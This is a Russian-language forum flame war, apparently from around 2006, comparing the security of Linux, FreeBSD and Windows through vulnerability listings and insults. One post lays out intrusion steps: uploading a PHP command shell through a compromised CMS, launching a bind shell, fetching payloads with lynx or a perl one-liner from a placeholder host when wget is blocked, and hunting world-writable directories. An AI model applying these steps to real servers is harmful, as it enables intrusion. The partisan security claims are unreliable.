Опять ты слова из воздуха берёшь?
Нет, я беру уязвимости с http://www.freebsd.org/security

Цитата
Хренсмаслом пишет:
REMOTE ROOT в WIFI FreeBSD-SA-06:05.80211
Ну во-первых WIFI сети IEEE 802.11 встречаются довольно редко, ни на большинстве домашних компьютеров, ни на большинстве серверов не стоит такое ПО.
Угу, NFS и WiFi встречаются редко, поэтому дыр нет. Я ведь тоже могу заявить, что iptables и все в чем есть дыры в ядре Linux встречаются крайне редко.

Цитата
Хренсмаслом пишет:
Если ты не покупаешь, а качаешь из интернета (многие, в том числе я, предпочитают именно так и делать), то зачем ты качал гигабайты GNU мусора вместе со своим дистрибутивом?
А ты в курсе сколько весят официальные Debian Mininstall и Gentoo Mininstall+stages? Там только необходимый минимум - остальное только то, что нужно берется одной командой из Интернет, это не то же самое, что болванка с виндой, полная виндового мусора и не угребищность, когда юзер ползает по гуглям, затем по сайтам, ищет где загрузка, загружает софт, который при установке задает тучу идиотских вопросов и при каждом обновлении операция повторяется, в отличие от Linux, где пакеты ставятся одной командой, нужно только знать название пакета(его можно найти по локальной базе - apt-cache search либо emerge -S/esearch) и затем обновляются все разом двумя командами apt-get update&&apt-get upgrade(Debian) или emerge sync&&emerge(Gentoo) либо через yum(Fedora) или up2date(RH).

Цитата
Хренсмаслом пишет:
Нормальные люди знают, что RPCSS вещь очень функциональная следовательно весьма не безопасная, и поэтому фильтруют доступ к рпц и разрешают его только для определенных адресов или запрещают сетевой доступ к нему вообще.
Кстати есть маленький секрет, нужно запретить доступ Network Service к DCOM_RemoteGetClassObject, сделать это можно через стандартную comexp.msc
Нормальны люди знают, что DCOM, особенно у мелкомягких, это огромная дыра и недоумевают почему M$ выставили DCOM торчать в сеть по умолчанию.
Ты лучше вместо рассказа о том, как винде подставить костыли, расскажи как пользователю, не нуждающемуся в этом "функциональном" RPC, отключить его вообще без ущерба для работоспособности системы и программ и как при установке объяснить тупой винде, чтобы она не ставила этот мусор? Продемонстрируй-ка глубокое знание системы и то, как винда подчиняется профессионалам. :)))

Цитата
Хренсмаслом пишет:
Что касается включенного ICF - по умолчанию он включен и в XP (не только в SP2) и в 2k3 (не только в SP1), просто пользователи часто его не подключают к ras-подключению.
Вот ты и лжешь потому, что на XP SP0-1 и Win2k3 SP0(насчет SP1 не знаю)ICF не включен по умолчанию на сетевых соединениях, а поскольку система для домохозяек, то так по умолчанию и торчат дырявые винды в инет, будучи подключенными через Ethernet и ADSL, без файрвола и прекрасно ломаются через свои многичсленные удаленные дыры,дающие наивысшие полномочия и валятся и от IGMPv3 и от MS05-19, что подтвердили многократные червяки, ломавшие RPC, IIS, MS SQL, службу RPC, службу PNP и службу LSASS, не говоря уже про другие службы также дающие REMOTE SYSTEM, которыми занимались толпы киддисов(WINS, Messanger, RPCv2, Workstation,RPC Locator, Server и т.д.).

Цитата
Хренсмаслом пишет:
Так как просто невозможно соединится с 135, 137-139, 445 портами.
Винда по умолчанию пускает на 137-139 и 445 порты всех из той же подсети, а ранее(до SP2) ICF содержал ошибку, которая пускала на  эти порты любых желающих из Интернета, если ICF был включен на коммутируемом соединении. :)))))

Цитата
Хренсмаслом пишет:
Это разве ядро? Что тебе даст это дыра? То что когда ты будешь отправлять письмо через sendmail, то засчёт этой уязвимости ты сможешь выполнить любой код от самого же себя?
Нет - это локальный рут в дырявой FreeBSD, которая имеет сендмыло в базовой системе по умолчанию, как и локаьный рут для некоторых Linux-ов, в которых sendmail - умолчальный MTA.

Цитата
Хренсмаслом пишет:
тут как раз прямые руки не помогут, потому что логи iptables пишут большинство админов и чем секьюрнее они хотят сделать систему, тем больше логов они предпочитают писать, но вот эти логи оборачиваются против них. Через дырявую iptables дырявого линуксятника их удаленно имеют по самое не хочу.
А ты в курсе, что логгирование может быть и не через -j LOG, а через -j ULOG, с которой уязвимость не проявляется, как у меня, поэтому мне начхать на эту ошибку? :) Кстати у большинства админов логгирование отброшенных пакетов в iptables не ведется, поэтому их хосты также не были подвержены опасности.

Цитата
Хренсмаслом пишет:
Ага, особенно много усилий нужно чтобы поломать популярные дырявые скрипты форумов, CMS, чатов итд, уязвимости в которых обнаруживают чуть ли не каждый день.
Как ты там говорил про нормальных людей? У нормальных людей для PHP запрещено выполнение системных команд(запрещены функции shell_exec, exec, system, ...) или стоитт safe mode.

Цитата
Хренсмаслом пишет:
Просто у Windows функциональность по умолчанию намного выше, в отличие от систем для подростков-хакирей.
Ага, для подростков-хакирей, хакеров и прочих технических специалистов, функциональность которой по умолчанию(как ядра, так и системы на базе Linux в целом из коробки) намного выше винды. Винда по умолчанию вообще не может обращаться ни к мобилам, ни к фотоаппаратам, ни проигрывать 3gp, не видит твтюнеров и обладает убогим софтом, сливающим почти по всем пунктам штатному линуксовому софту дистрибутива.

Цитата
Хренсмаслом пишет:
Windows поддерживает управление большинством функций И через консоль И через гуи.
Но я тебе не виню, ты ведь показал, что знаешь Windows ещё хуже, чем домохозяйка, когда заявил что netsh нельзя заменить гуём, а такие замены есть, и во многом это оснастки MMC.
Вперед показывать мне как настроить в WinXP NAT из GUI(ICS), если внутренний интерфейс у машины не 192.168.0.1 и в сети уже присутствует машина с IP 192.168.0.1. Или как в винде XP настроить RRAS из GUI. Tip: это возможно только из netsh.
Я вижу ты только и умеешь как делать пустые заявления. Ты еще не продемонстрировал своих возможностей по отключению RPC без ущерба системе и не продемонстрировал мощных возможностей роутинга стандартными средствами убогой винды(RRAS) так, чтобы занатить трафик от двух сетей на два разных канала одновременно - то что в Linux решается iptables+iproute2, можно задать задачку по настройке шейпинга виндовыми средствами, чтобы окончательно посадить винду с ее "мощным" сетевым стандартным функционалом  в лужу ...


Цитата
Хренсмаслом пишет:
1. FreeBSD local root на дырявое ядро фри - ты как то, в общем, назвал сказку, а по конкретнее нельзя уточнить, в чём дырка-то?
О "FreeBSD local root на дырявое ядро фри, shmat.c" и была речь.

Цитата
Хренсмаслом пишет:
3. sendmail - ну и что тебе он даст, то что ты сможешь со своими же привелегиями выполнить код? Кстати никакого эксплоита в паблике не валяется, а если приватный и есть, то он бесполезен.

Это remote root, читай адвайзори, которым и локально можно воспользоваться если сендмыло висит на 127.0.0.1.

III. Impact

A remote attacker may be able to execute arbitrary code with the
privileges of the user running sendmail, typically root.


Цитата
Хренсмаслом пишет:
4. "Эксплоит еще одну дыру в ядре FreeBSD-SA-05:02.sendfile валяется в паблике. "
А что первый sendmail - ты от 2003 года чтоль взял? Хех, она уже давно нигде не работает.
Не тормози. Это дыра в sendfile в ядре, за 2005 год, еще одна, потому что показывал еще локальные дыры повышения привилегий в ядре FreeBSD-SA-06:06.kmem.asc и FreeBSD-SA-05:08.kmem.asc.

Поглядел наискосок на список дыр.

Цитата
Хренсмаслом пишет:
2 Linux Kernel NFS Client Denial of Service Vulnerability (Vulnerabilities) Rank: 418
Last modified on: 2006-03-23 00:00:00 PST
URL: http://www.securityfocus.com/bid/16922
Как ты там сказал - NFS очень редко используется? Тем более локальная...

Цитата
Хренсмаслом пишет:
3 Linux Kernel XFS File System Local Information Disclosure Vulnerability (Vulnerabilities) Rank: 418
Last modified on: 2006-03-23 00:00:00 PST
URL: http://www.securityfocus.com/bid/16921
Для тех, кто пользуется XFS, у тех у кого нет XFS на диске, нет и DoS. Естественно в отличие от убогой и винды и фри у фри больше функционала, больше разных I/O шедуллеров, больше файловых систем, поэтому и дыр должно быть больше.

Цитата
Хренсмаслом пишет:
11 Linux Kernel 64-Bit SMP Routing_ioctl() Local Denial of Service Vulnerability (Vulnerabilities) Rank: 418
Last modified on: 2006-03-23 00:00:00 PST
URL: http://www.securityfocus.com/bid/14902
Только для 64-разрядных систем

Цитата
Хренсмаслом пишет:
29 Linux Kernel ICMP_Push_Reply Remote Denial Of Service Vulnerability (Vulnerabilities) Rank: 418
Last modified on: 2006-03-02 00:00:00 PST
URL: http://www.securityfocus.com/bid/16044
Что ты там про ICF говорил? Если высказать аналогичную отмазку, что у нормальных админов  все кроме ICMP unreachable, ICMP reply и DefrgNeeded выключено, то проблемы нет.


Цитата
Хренсмаслом пишет:
6 Linux Kernel ATM Module Inconsistent Reference Counts Denial of Service Vulnerability (Vulnerabilities) Rank: 418
Last modified on: 2006-03-23 00:00:00 PST
URL: http://www.securityfocus.com/bid/17078
Для тех, у кого есть ATM.

Цитата
Хренсмаслом пишет:
13 Linux Kernel Netfilter Do_Replace Local Buffer Overflow Vulnerability (Vulnerabilities) Rank: 418
Last modified on: 2006-03-22 00:00:00 PST
URL: http://www.securityfocus.com/bid/17178
С правами рута эксплуатриутся гг?


Цитата
Хренсмаслом пишет:
14 Linux Kernel Raw_sendmsg() Kernel Memory Access Vulnerability (Vulnerabilities) Rank: 485
Last modified on: 2006-03-21 00:00:00 PST
URL: http://www.securityfocus.com/bid/14787
Аналог фревого kmem.

Цитата
Хренсмаслом пишет:
17 Linux Kernel SYS_GET_THREAD_AREA Information Disclosure Vulnerability (Vulnerabilities) Rank: 418
Last modified on: 2006-03-17 00:00:00 PST
URL: http://www.securityfocus.com/bid/15527
Ерунда

Цитата
Хренсмаслом пишет:
19 Linux Kernel Console Keymap Local Command Injection Vulnerability (Vulnerabilities) Rank: 418
Last modified on: 2006-03-16 00:00:00 PST
URL: http://www.securityfocus.com/bid/15122
Необходим физический доступ к локальной консоли и влияет только на локальные консоли.

Цитата
Хренсмаслом пишет:
24 Linux Kernel ProcFS Kernel Memory Disclosure Vulnerability (Vulnerabilities) Rank: 485
Last modified on: 2006-03-02 00:00:00 PST
URL: http://www.securityfocus.com/bid/16284
Тоже что и kmem.

Цитата
Хренсмаслом пишет:
26 Linux Kernel NFS ACL Access Control Bypass Vulnerability (Vulnerabilities) Rank: 418
Last modified on: 2006-03-02 00:00:00 PST
URL: http://www.securityfocus.com/bid/16570
Ерунда.

Цитата
Хренсмаслом пишет:
37 Linux Kernel SDLA IOCTL Unauthorized Local Firmware Access Vulnerability (Vulnerabilities) Rank: 418
Last modified on: 2006-02-22 00:00:00 PST
URL: http://www.securityfocus.com/bid/16304
Полная ерунда.

Цитата
Хренсмаслом пишет:
40 Linux Kernel DVB Driver Local Buffer Overflow Vulnerability (Vulnerabilities) Rank: 418
Last modified on: 2006-02-17 00:00:00 PST
URL: http://www.securityfocus.com/bid/16142
Только для тех, кто использует DVB...

Цитата
Хренсмаслом пишет:
49 Linux Kernel Device Driver Virtual Memory Flags Unspecified Vulnerability (Vulnerabilities) Rank: 418
Last modified on: 2006-02-07 00:00:00 PST
URL: http://www.securityfocus.com/bid/12338
Еще ерунда - эксплуатация DoS под рутом.. Да и к тому же  *  2.5 летне давности(jan 2004)


Цитата
Хренсмаслом пишет:
59 Linux Kernel BINFMT_ELF Loader Local Privilege Escalation Vulnerabilities (Vulnerabilities) Rank: 418
Last modified on: 2006-02-07 00:00:00 PST
URL: http://www.securityfocus.com/bid/11646
*  двухлетней давности(2004).


Цитата
Хренсмаслом пишет:
61 Linux Kernel Time_Out_Leases PrintK Local Denial of Service Vulnerability (Vulnerabilities) Rank: 418
Last modified on: 2006-02-07 00:00:00 PST
URL: http://www.securityfocus.com/bid/15627
Снова возможность свалить систему вызвав printk() из драйвера? Ерунда

Цитата
Хренсмаслом пишет:
64 SuSE Linux Kernel Unauthorized SCSI Command Vulnerability (Vulnerabilities) Rank: 418
Last modified on: 2006-01-17 00:00:00 PST
URL: http://www.securityfocus.com/bid/11784
Только SuSe.

Цитата
Хренсмаслом пишет:
80 Linux Kernel SYSFS_Write_File Local Integer Overflow Vulnerability (Vulnerabilities) Rank: 418
Last modified on: 2006-01-11 00:00:00 PST
URL: http://www.securityfocus.com/bid/13091
Не вижу чтобы куда-то в sysfs мог писать кто-то кроме рута. Ерунда.

Цитата
Хренсмаслом пишет:
78 Linux Kernel Netfilter Memory Leak Local Denial of Service Vulnerability (Vulnerabilities) Rank: 418
Last modified on: 2006-01-11 00:00:00 PST
URL: http://www.securityfocus.com/bid/12816
Баге больше года.

Цитата
Хренсмаслом пишет:
81 Linux Kernel Multiple Local Vulnerabilities (Vulnerabilities) Rank: 418
Last modified on: 2006-01-11 00:00:00 PST
URL: http://www.securityfocus.com/bid/11956
Декабрьский  *  2004 года.

Итого абсолютное большинство уязвимостей - локальные DoS, локальное чтение памяти, много ошибок в конкретных драйверах, которые специфичны для конкретной системы(в виндовых драйверах эти уязвимости вообще не считают), достаточно ошибок эксплуатирумых под рутом, а много вообще баянов 1.5-2.5 летней давности за 2004 и начало 2005 года, так что нечего бредить про сотни баг 2006 года - бОльшая часть ошибок за 2005 год, смотри в Published, а не Updated, ламир. ;)
Итого свежих баг очень мало, большинство - никчемные локальные DoS, а поднимающих привилегии так и вообще что-то не вижу из свежих за 2006 год. Вывод: все это ложь и провокация, не идущая ни в какое сравнение с удаленным переполнением в ядре дырявой  фри(Wifi) и удаленным выполнением кода через удаленное переполнение TCP/IP стека кошмарно дырявой винды, в которой локальных эксплоитов, повышающих права полно, плюс 8 дырок по сведениям secunia.org(линк выше) вообще не закрыты.
 
Цитата

^rage^ писал:

и что в этом трудноосуществимого?
Удалено вы это сделать не сможете, вам надо будет создавать специальный сервер для этой цели, который будет взаимодействовать с httpd.
А потом ещё как то заставить туда кого-нибудь зайти, а это надо дураков поискать.
Ну а самое главное, что пассивные ПК вы таким образом не положите. Так как вы просто не сможете взаимодействовать с их закрытыми портами, а они не будут взаимодействовать с вами. Т.е. не получится вальнуть целую сеть из пассивных ПК, как вы предлагали.
Цитата

^rage^ писал:

вас послушаешь, так в каждом скрипте есть дырка с remote command execution.
Да, в большинстве популярных BB и CMS регулярно появляются новые дыры. А удаленное выполнение вовсе не обязательно, достаточно получить доступ к админке CMS, после чего залить php-скрипт, который будет передавать system() твою команду и запускать этот php скрипт прямо через браузер. А потом уже через php можно запустить что-нибудь и поинтереснее, вроде биндшелла на си.
Ну а если в скрипте дырка на выполнение команд, так это вообще отлично.

Чаще всего выбирают продукт, в котором последняя уязвимость найдена и ищут какие сайты используют уязвимую версию этого продукта.
Цитата

1)кто позволит несчастному nobody запустить /usr/bin/echo?
2)кто позволит несчастному nobody запустить /usr/bin/wget?
3)кто позволит несчастному nobody запустить /usr/bin/gcc?
4)кто позволит несчастному nobody писать куда-то кроме /tmp ?
Что касается gcc - эксплоит можно скомпилировать заранее, многие чаще всего так и делают, потому что на шеллах очень часто проблемы с gcc.
Основная проблема - это блокировка wget.
Но её можно обойти либо через lynx -
lynx -source [соурс] >> [куда сохранять]
А если и lynx заблочили - то на перле можно реализовать
прямо в одну строчку
perl -MLWP::Simple -e "getprint 'http://tratata.tata/tata'"
Сколько раз тестировал, обычно хотя бы один из этих методов работает :)
Что касается куда писать? Очень часто на сервере большое кол-во сайтов, и директории внутри некоторых из них имеют права на запись/чтение/запуск для любого пользователя, а ещё очень часто в каталоге того же сайта имеются директории типа images также с правами записи/чтения/запуска для всех, а ещё встречаются случаи, когда nobody является оунером самой images.
Так что тут главное поискать.
Ну и хорошо бы иметь приватные эксплоиты на какие-нибудь баги из той сотни уязвимостей ядра линукса за 2006 год, что я привёл.
Цитата

^rage^ писал:

клик
http://www.security.nnov.ru/Enews925.html - лучше эту ссылку давать.
Цитата

^rage^ писал:

Workaround/Fix:
use grsec
К счастью на многих крупных серверах с десятками тысяч клиентов grsec отключен. Говорят из-за нагрузки.
Это как DEP в NT :) С ним тоже трудно что-либо сделать, но на 2k3 Sp1 он иногда не включен.


Цитата

^rage^ писал:

примеры? убийственное шлимыло, которое нормальные админы заменяют на postfix или exim?
sa-exim Unauthorized File Access Vulnerability - дырка в спамфильтре под exim.
Но как показывает практика sendmail редко заменяют. Да если бы начали заменять, сразу бы багов на альтернативные мэйлеры нашлось. Это как с бывшим "сверхбезопасным" браузером Firefox, под который за 2006 год аж 2 эксплоита написали.
Помимо сендмэйла, ещё различные телнет, ssh даемоны, ftpd, httpd, cron (local),  всякие cpanel (local/remote) да и вообще проще взять листинг запущенных сервисов и оттуда их назвать.

Цитата

^rage^:

А чем так разительно отличаются демоны в линухе от демонов во freebsd? Может дырявое шлимыло перестанет быть таковым? Или уязвимая под linux версия wu-ftpd под freebsd станет неуязвима?
Да вот не всегда в дистрибутивах linux стоят в точности одни и те же службы, что и во freebsd.
Цитата

^rage^ писал:

Обьём кода windows много больше чем ядра Linux.
Кода Windows, а не ядра Windows. Конечно учитывая большую функциональность и наличие графики кода больше. Но ведь мы говолили о ядрах.

Цитата

^rage^ писал:

Так где же эта функциональность? Где эти фантастические возможности?
как насчёт двух каналов и двух локальных сетей?
Я уже писал об этом выше (искать по строчке ICS).

Цитата

^rage^ писал:

бред. высосано из пальца. Для неиспользуемых портов - TARPIT. Логать неразумно, т.к. это потенциальный dos.
Потенциально или нет, но по умолчанию используется.
Цитата

^rage^:

PS: не стоит забывать, что Linux - это не только ia-32.
NT - тоже, существует она для всех основных платформ ia-32, ia-64, x64.
И главное что под них реально есть драйвера устройств. А не только реализация ОС под набор инструкций процессора.

Цитата

^rage^ писал:

Насчёт остального бреда. Давайте так: я вам даю шелл на двух машинах с Linux. Ядра не самые свежие. Ваша задача: получить id=0, либо уложить local dos.
Это вы бредите.
Разумеется, вы включите grsec, а ядро будет такое, что эксплоиты под него окажутся не особо полезны. А может ещё и закроете wget, perl, python, да и вообще всё что можно.
Вот если вы отключите grsec и оставите хотя бы perl, тогда я могу попробовать :) По-крайней мере DoS, так как у меня только на него есть приватный эксплоит. Я ж не ефнетовский трейдер)


Давайте лучше вы поломаете 2k3 sp1, через доступ к серверу IIS с secureiis, на котором будет простой скриптик `$cmd`, через который вы сможете выполнить любую допущенную команду, в общем что-то вроде browser-shell :)
Что будет вам мешать - на сервере будет включен DEP, будет стоять VR, а в качестве SO будет использована политика hisecws. Ах да, баги в DEP-е типа lookaside пофиксены. Ну и, разумеется, порты нетбиоса не будут доступны даже с лупбэка, а к RPC доступ будет ограничивать как раз VR.
Я уверен, что вы не сможете что-либо сделать, даже DoS.
 
Цитата

Гость писал:

Взлом дырявой винды через WMF легкоосуществим и никакой виндовый DEP не поможет. :)
Ну и как же ты его собираешься осуществлять? Заставлять пользователя скачивать WMF файл и запускать его?
К тому же это не ядро, а GDI модуль и следовательно ты не можешь повысить привилегии.
Читай внимательно
"Удаленный пользователь может с помощью специально сформированного WMF файла выполнить произвольный код на целевой системе с привилегиями пользователя, открывшего злонамеренный файл."
Я например всегда всё запускаю и открываю от guest через runas() и как же этот WMF мне повредит, да никак - ты  опять бредишь со своим линуксом в котором сотня дырок за 2006 год.
Цитата

Гость писал:

Вот они и положат твою дырявую фрю через одну из десятка свежайших дыр во фре - или устроят панику через NFS или словают через WIFI или уронят если не получится проломить, или SSH свалят или через IPSEC уронят, и с виндой тоже самое - через дыры в TCP/IP уронят или сломают.
SSH - ну и пусть валят? Админ просто патч поставит и всё, а IPSEC не уронят и я тебе объяснял почему, а если и эксплуатируют - то линуховский ipsec.
И сказки про NTшный TCP/IP не рассказывай, igmpv3 прекрасно фильтруются любым браундмауэром.
Цитата

Гость писал:

Угу их меньше, но они большинство удаленные, в т.ч. удаленное переполнение буфера в ядре(WIFI). =)
Ухаха, не смеши меня.

Во-первых WIFI сети IEEE 802.11 встречаются довольно редко, ни на большинстве домашних компьютеров, ни на большинстве серверов не стоит такое ПО.
Мало того:
An integer overflow in the handling of corrupt IEEE 802.11 beacon or
probe response frames when scanning for existing wireless networks can
result in the frame overflowing a buffer.

Всё это потенциально возможно, но на практике, как мы с тобой знаем, никто так и смог сделать эксплоит и грош цена этой "уязвимости".

А вот линуксятину можно не только через те сто дыр иметь, но можно ещё и удаленно
Linux Kernel ICMP_Push_Reply RemoteDenial Of Service
Linux Kernel IP6_Input_Finish Remote Denial Of Service
Linux Kernel ICMP_Send Remote Denial Of Service
Linux Kernel Netfilter Ipt_recent Remote Denial of Service
;))))
Цитата

Гость писал:

А если несложный то легко подберется, а если юзеров на хосте за сотню, то будет тебе массдефейс или несколько десятков акканутов на машину, чтобы ковырять фрю до рута спокойно, поэтому не надо ляля про несущественную опасность.
А минимальная длина и сложность пароля для чего? Хех, всё твоё писание сливается на нет -)
Цитата

Гость писал:

Угу, только про порутание фри через cpanel, proftpd, samba, sendmail и "прочие популярные даемоны линукса" не забудь.
Cpanel чаще всего на линукс ставят, samba и sendmail тоже всегда та линуксятине стоит, и через них линуксёнка отлично имеют -) Практически вси linux хостинги используют sendmail.
Цитата

Гость писал:

Популярные стандартные демоны запускаются под НЕПРИВИЛЕГИРОВАННЫМИ правами
Угу, "особенно ssh и cpanel".
Цитата

Гость писал:

Это ж не венда, у которой все под LOCAL SYSTEM идет, и стандартные дырявые сервисы
Анонимная запись IUSR используется например, так что не надо чушь нести -)
Цитата

Гость писал:

Для тех, у кого с логикой туго, поясняю: толку много - отсутствие необходимости создавать драйвера под каждую конкретную ОС(что навсегда решит проблемы с отсутвием драйверов под FreeBSD, Solaris, Linux,...), отсутствие необходимости устанавливать эти драйвера.
У кого-то это у тебя, необходимости то не будет, но эти драйвера будут настолько малофункциональны, что я бы назвал проблемным вариант перехода на EFI.
Цитата

Гость писал:

NFS реализован в ядре вообще-то, поэтому и ловит твоя дырявая фря удаленно кернелпаник.
Кернел паник из-за запроса mount. Только вот никто nfsd не пользуется, так что подотри носик и рассказывай сказки дальше.
Цитата

Гость писал:

И что бы ты не рассказывал про неособую популярность, дыра тем не менее есть, удаленная DoS, которая стоит многих сотен локальных уязвимостей Linux.
Да одна дыра в ядре линукса эксплуатируемая через linuxmsyncex.c стоит всех перечисленных тобою псевдо-уязвимостей FreeBSD
Цитата

Гость писал:

Ну так и правильно 100% реализации и не будет, потому что мелкомягкая никому документации полной не дала
Ну вот вы так всегда и будете работать под тормозящим Wine.
Цитата

Гость писал:

На вон, погляди как 1С бегает под Linux-овым Wine со свистом, оставляя винду с нативным Win32API позади http://etersoft.ru/content/view/62/63/. )))
ГГ ну конечно компания Etersoft будет писать что их продукт WINE@Etersoft 1.0 быстрее, дураку понятно что это самореклама для повышения продаж :)
PS
WINE@Etersoft 1.0 Network
Цена 5600 руб.
http://sales.etersoft.ru/order
;))
Цитата

Гость писал:

В Starcraft(DirectX) и HalfLife+CounterStrike(OpenGL) на нормальных fps-ах под cedega
На нормальных, но раза в 3 ниже, чем под Windows.
А DirectX игры - там потеря, наверное раз в 10, вот поэтому и запускают таких старичков как Starcraft, которые по 400 FPS дают на родной Windows и родном DirectX
Цитата

Гость писал:

Угу, NFS и WiFi встречаются редко, поэтому дыр нет. Я ведь тоже могу заявить, что iptables и все в чем есть дыры в ядре Linux встречаются крайне редко.
NFS и WiFi это действительно редкость, а iptables используется часто.
Да и из той сотни дыр в решете, т.е. в ядре линукса, что я тебе представил большинство как раз на фукнции ядра, которые не зависят там от всяких WIFI девайсов. Ну а nfsd это вообще не ядро.
Цитата

Гость писал:

А ты в курсе сколько весят официальные Debian Mininstall и Gentoo Mininstall+stages? Там только необходимый минимум - остальное только то, что нужно берется одной командой из Интернет, это не то же самое, что болванка с виндой, полная виндового мусора и не угребищность, когда юзер ползает по гуглям, затем по сайтам, ищет где загрузка, загружает софт, который при установке задает тучу идиотских вопросов и при каждом обновлении операция повторяется, в отличие от Linux, где пакеты ставятся одной командой, нужно только знать название пакета(его можно найти по локальной базе - apt-cache search либо emerge -S/esearch) и затем обновляются все разом двумя командами apt-get update&&apt-get upgrade(Debian) или emerge sync&&emerge(Gentoo) либо через yum(Fedora) или up2date(RH).
Искать в каталоге мусора GNU :))
Всё что реализовано под линукс - недоделанное, они попытались реализовать как можно больше кодеков, но в Windows klite codec pack их всё равно больше.
А используя гугл скачать нужное ПО - это один момент.
Цитата

Гость писал:

Нормальны люди знают, что DCOM, особенно у мелкомягких, это огромная дыра и недоумевают почему M$ выставили DCOM торчать в сеть по умолчанию.
Если эту "дыру" легко закрыть, о чём я тебе уже несколько раз писал, то вот сотню дыр в решете, т.е. в функциях ядра линукса ты никак не закроешь.
Цитата

Гость писал:

Вот ты и лжешь потому, что на XP SP0-1 и Win2k3 SP0(насчет SP1 не знаю)ICF не включен по умолчанию на сетевых соединениях, а поскольку система для домохозяек, то так по умолчанию и торчат дырявые винды в инет, будучи подключенными через Ethernet и ADSL, без файрвола и прекрасно ломаются через свои многичсленные удаленные дыры,дающие наивысшие полномочия и валятся и от IGMPv3 и от MS05-19
Просто ты домохозяйка в которую тебя превратило решето, т.е. линукс и поэтому не можешь нормально пользоваться ICF. А служба ICF всегда запущена по умолчанию и при создании RAS подключения нужно просто подключить ICF.
С secpol.msc (IP Secuirity) не страшен никакой MS05-19.
Цитата

Гость писал:

Нет - это локальный рут в дырявой FreeBSD, которая имеет сендмыло в базовой системе по умолчанию, как и локаьный рут для некоторых Linux-ов, в которых sendmail - умолчальный MTA.
Ни в некоторых, а в большинстве линускятников по умолчанию.
Цитата

Гость писал:

А ты в курсе, что логгирование может быть и не через -j LOG, а через -j ULOG, с которой уязвимость не проявляется, как у меня, поэтому мне начхать на эту ошибку? :)
ULOG через сокеты netlink передаёт пакеты специальному даемону, который может выполнять журналирование в различных форматах, короче говоря ULOG - это лишняя нагрузка на ЦП.
По умолчанию все используют LOG.
Кстати это не единственная удаленная дыра в решете линукса - я уже приводил другие, вот ещё раз -
Linux Kernel ICMP_Push_Reply RemoteDenial Of Service
Linux Kernel IP6_Input_Finish Remote Denial Of Service
Linux Kernel ICMP_Send Remote Denial Of Service
Linux Kernel Netfilter Ipt_recent Remote Denial of Service

А вот во FreeBSD нет ни одной remote дыры -)
Цитата

Гость писал:

Как ты там говорил про нормальных людей? У нормальных людей для PHP запрещено выполнение системных команд(запрещены функции shell_exec, exec, system, ...)
А ещё есть passthru()
;)
И как показывает практика не запрещены и остальные.
Цитата

Гость писал:

Ага, для подростков-хакирей, хакеров и прочих технических специалистов, функциональность которой по умолчанию(как ядра, так и системы на базе Linux в целом из коробки) намного выше винды. Винда по умолчанию вообще не может обращаться ни к мобилам, ни к фотоаппаратам, ни проигрывать 3gp, не видит твтюнеров и обладает убогим софтом, сливающим почти по всем пунктам штатному линуксовому софту дистрибутива.
У тебя технические специалисты ограничены подростками-хакирами)
Функциональность Windows во много раз превышает функциональность линуксятника.
Windows имеет и драйвера и ПО, которые за считанные секунды позволяют использовать абсолютно любой девайс полнофункционально.
А линукс - старайся не старайся, ни фотоаппараты ни мобильники полнофункционально работать не будут, да какие там полнофункционально, большинство мобильников вообще нормально не работает под кривым ПО линуксятника.
Под работой мобильника - я называю возможность управлять телефоном с компьютера, редактировать EEPROM, Bootcore, возможность обновлять прошивку.  А под линуксом у некоторых мобильников даже flex подключить нельзя. Под линуксятиной нет ни анлокеров, ни дамперов, ни тестпоинтеров, ни логгеров для различных моделей мобильных телефонов.
Под работой фотоаппарата я подразумеваю, возможность передачи изображения на экран, возможность использования фотоаппарата, как прямую веб-камеру, возможность перепрошивать фотоаппарат, а линускятина даже многие RAW форматы не распознаёт.
Цитата

Гость писал:

как в винде XP настроить RRAS из GUI. Tip: это возможно только из netsh.
Ты толком то netsh не знаешь, просто красивое слово добавил.
А что касается RRAS - то большинство основных настроек соединения и проколов применяемых к нему доступно в св-вах подключения.
Цитата

Гость писал:

Ты еще не продемонстрировал своих возможностей по отключению RPC без ущерба системе
С DEP RPC практически неуязвим, но если уж тебе надо его отключить, воспользуйся
sc config rpcss start= disabled
Только я бы рекомендовал оставить его для локального пользования и просто закрыть 135/445 порты
Цитата

Гость писал:

чтобы занатить трафик от двух сетей на два разных канала одновременно - то что в Linux решается iptables+iproute2
В Windows в св-вах соединения канала (ICS), выбираешь любое подключение по локальной сети, для которого будет расшарен данный интернет канал. И делаешь так с обоими соединениями.
Цитата

Гость писал:

чтобы окончательно посадить винду с ее "мощным" сетевым стандартным функционалом в лужу ...
Если у тебя сеть мелких или средних размеров, то ISA будет там хорошо работать, и iptables тоже. Только вот в крупных сетях с реально большой нагрузкой программные брандмауэры будут неимоверно нагружать ЦП, и iptables относится к таким брандмауэрам. В таких сетях по любому ставятся аппаратные средства, вроде роутеров.
Цитата

Гость писал:

О "FreeBSD local root на дырявое ядро фри, shmat.c" и была речь.
Во-первых shmat старый баг от 2004 года, а экплоита так и не появилось в паблике, может его просто нет? )
И главное - этой уязвимости больше двух лет, за те времена в ядре линукса столько локал рутов было... Достаточно вспомнить 2 mremap-а, munmap, uselib, do_brk и прочие.
За последний год в ядре FreeBSD нету ни одной Remote и ни одной Local root уязвимости,
а под решето линукса вышел 1 эксплоит local root linuxmsyncex.c, а ещё сотня дыр в ядре, на многие из которых наверняка существуют приватные эксплоиты, а также под решето линуксятника доступна куча Remote
уязвимостей
Linux Kernel ICMP_Push_Reply RemoteDenial Of Service
Linux Kernel IP6_Input_Finish Remote Denial Of Service
Linux Kernel ICMP_Send Remote Denial Of Service
Linux Kernel Netfilter Ipt_recent Remote Denial of Service
Цитата

Гость писал:

Это remote root, читай адвайзори, которым и локально можно воспользоваться если сендмыло висит на 127.0.0.1.

III. Impact

A remote attacker may be able to execute arbitrary code with the
privileges of the user running sendmail, typically root.
Typically – "типично, в том числе" для рута.
Да и sendmail это не только приложение FreeBSD и уж тем более не ядро.
Большинство линуксятников также используют сендмейл, как стандартную службу отправки. Практически на всех линук-хостингах так.
Цитата

Гость писал:

Не тормози. Это дыра в sendfile в ядре, за 2005 год
Угу, которая если бы да кабы совпадут обстоятельство потенциально позволяет получить доступ к определенным блокам памяти.
Только вот никто не научился через неё выдирать пароли, увы, и она бесполезна.

Цитата

Гость писал:

еще локальные дыры повышения привилегий в ядре FreeBSD-SA-06:06.kmem.asc и FreeBSD-SA-05:08.kmem.asc.
Хех, какое там повышение привелегий, ты через неё можешь получить только master.passwd, а в случае если установлена минимальная длина и сложность паролей, ты  их и за сто лет не подберёшь.

Цитата

Гость писал:

Цитата

Хренсмаслом пишет:
